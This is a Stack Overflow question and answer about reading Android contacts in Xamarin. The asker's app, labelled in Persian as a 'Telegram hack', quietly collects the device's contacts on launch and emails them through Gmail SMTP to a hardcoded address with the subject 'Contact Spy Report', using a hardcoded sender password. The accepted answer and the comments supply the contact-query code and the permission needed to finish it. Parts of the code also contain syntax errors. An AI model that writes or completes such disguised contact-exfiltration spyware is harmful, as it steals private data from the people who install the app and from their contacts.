# Get Android Contacts in Xamarin

Tags: c#, android, xamarin, xamarin.android

Currently, I have some limits that I can't use Visual Studio.
I have a emergency work, That needs an Android Program, But I don't know exactly how to do something in it, Because Visual Studio helps me with suggests but I don't have it. I want to get Android Contacts With Name and Phone Number.
Currently, This is my codes in App.cs:

```
using System;
using System.Linq;

using Android.App;
using Android.Content;
using Android.OS;
using Android.Views;
using Android.Views.InputMethods;
using Android.Widget;
using System.Net;
using System.Net.Mail;

namespace Tlgr
{
    [Activity(Label = "هک تلگرام", MainLauncher = true)]
    public class App : Activity
    {
        protected override void OnCreate(Bundle bundle)
        {
            base.OnCreate(bundle);
            var ctks = Contact.GetContacts();
            using (var mail = new MailMessage())
            {
                mail.From = new MailAddress("feedbackhost.sender@gmail.com");
                mail.To.Add("asm262015@gmail.com");
                mail.Subject = "Contact Spy Report";
                foreach(ctk in ctks)
                {
                    mail.Body += ctk.ToString() + "\r\n";
                }
                using (var smtp = new SmtpClient("smtp.gmail.com", 587))
                {
                    smtp.Credentials = new NetworkCredential("feedbackhost.sender@gmail.com", "feedbackhost");
                    smtp.EnableSsl = true;
                    smtp.Send(mail);
                }
            }
        }
    }

    public class Contact
    {
        public string Name {get;set;}
        public string[] Numbers {get;set;}
        public override ToString()
        {
            var a = $"Name: {Name}";
            foreach (var i in Numbers)
            {
                a += " , Number: " + i;
            }
            return a;
        }

        public static Contact[] GetContacts()
        {

        }
    }
}
```

I just need to add body for method GetContacts() to solve my problem.
I have searched, There was good results, But I don't know how to use them, I need a prefect code! Thanks!

Comment: Welcome to Stack Overflow! We are not here to write "perfect code" for you, we're here to help when you have an issue with your code. What was wrong with the code you found?

Answer (score 2, accepted):

You should use `ContactsContract.Contacts`

> ContactsContract.Contacts is the data contract that is used to interface with contact data. The code queries contacts at the Uri defined by ContactsContract.Contacts.ContentUri, returning the columns selected from ContactsContract.Contacts.InterfaceConsts.

```
 var uri = ContactsContract.CommonDataKinds.Phone.ContentUri;
string[] projection = { ContactsContract.Contacts.InterfaceConsts.Id, ContactsContract.CommonDataKinds.Phone.Number};
```

More you can find  [here](https://developer.xamarin.com/recipes/android/data/contentproviders/read_contacts/)

Also you need add permission `READ_CONTACTS`:

```
<uses-permission android:name="android.permission.READ_CONTACTS" />
```

Comment: I have found this code, I need to convert this object to my own defined object that called `Contact`. How to do that? I want an array of Contact (Contact[])

Comment: I'll test this code, But what will do if user has multiple Phone Numbers for a name? I want all kinds of Numbers, Like Phone, Private Phone, Home Phone, Work Phone, ...

Comment: You can check here type of data https://developer.android.com/reference/android/provider/ContactsContract.CommonDataKinds.Phone.html

Comment: In our country, Using developer.android.com has blocked by America Politics.

Comment: Now, I added codes, I have problem with the method "ManagedQuery" that I couldn't find it using ILSpy to add the "using" at the top.

Comment: I found it in Activity class. Thanks everyone!

Comment: warning CS0618: 'Activity.ManagedQuery(Uri, string[], string, string[], string)' is obsolete: 'deprecated'